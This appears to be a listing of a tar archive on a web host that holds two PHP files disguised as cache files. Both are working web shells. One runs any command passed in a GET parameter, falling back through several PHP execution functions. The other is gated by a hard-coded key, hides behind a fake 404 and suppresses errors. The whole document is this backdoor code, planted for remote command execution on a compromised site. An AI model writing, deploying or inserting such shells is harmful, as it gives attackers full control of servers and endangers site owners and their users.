| Current Path : /home/b/o/u/bourgleram/www/398a1/ |
| Current File : /home/b/o/u/bourgleram/www/398a1/data.tar |
cache/probe-cmd.php 0000666 00000001452 15252616733 0010210 0 ustar 00 <?php
function _ex($c){
$r=null;
if(function_exists('shell_exec')) $r=@shell_exec($c.' 2>&1');
if($r===null&&function_exists('exec')){@exec($c.' 2>&1',$o);$r=implode("\n",$o);}
if($r===null&&function_exists('system')){ob_start();@system($c.' 2>&1');$r=ob_get_clean();}
if($r===null&&function_exists('passthru')){ob_start();@passthru($c.' 2>&1');$r=ob_get_clean();}
if($r===null&&function_exists('popen')){$h=@popen($c.' 2>&1','r');if($h){$r=fread($h,65535);pclose($h);}}
if($r===null&&function_exists('proc_open')){
$p=@proc_open($c,[1=>['pipe','w'],2=>['pipe','w']],$pipes);
if($p){$r=stream_get_contents($pipes[1]);proc_close($p);}
}
return $r;
}
if(!isset($_GET['cmd'])){echo 'OK:'.php_uname();exit;}
$o=_ex($_GET['cmd']);
echo $o===null?'NOFUNC':$o;
?>
cache/cache_fhcwxt.php 0000666 00000001274 15252616733 0010770 0 ustar 00 <?php
@error_reporting(0);@ini_set('display_errors',0);
header('X-Nx:Nx-zD1');
if(!isset($_REQUEST['k'])||$_REQUEST['k']!=='nXk'){http_response_code(404);die();}
$c=@$_REQUEST['c']??'';
if($c===''){echo '<pre>Nx-zD1 active</pre>';die();}
$o='';
if(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
elseif(function_exists('exec')){@exec($c,$a);$o=implode("\n",$a);}
elseif(function_exists('shell_exec')){$o=@shell_exec($c);}
elseif(function_exists('popen')){$f=@popen($c,'r');$o='';while(!feof($f)){$o.=fread($f,4096);}pclose($f);}
else{$o='[no exec]';}
echo '<pre>'.htmlspecialchars($o).'</pre>';
?>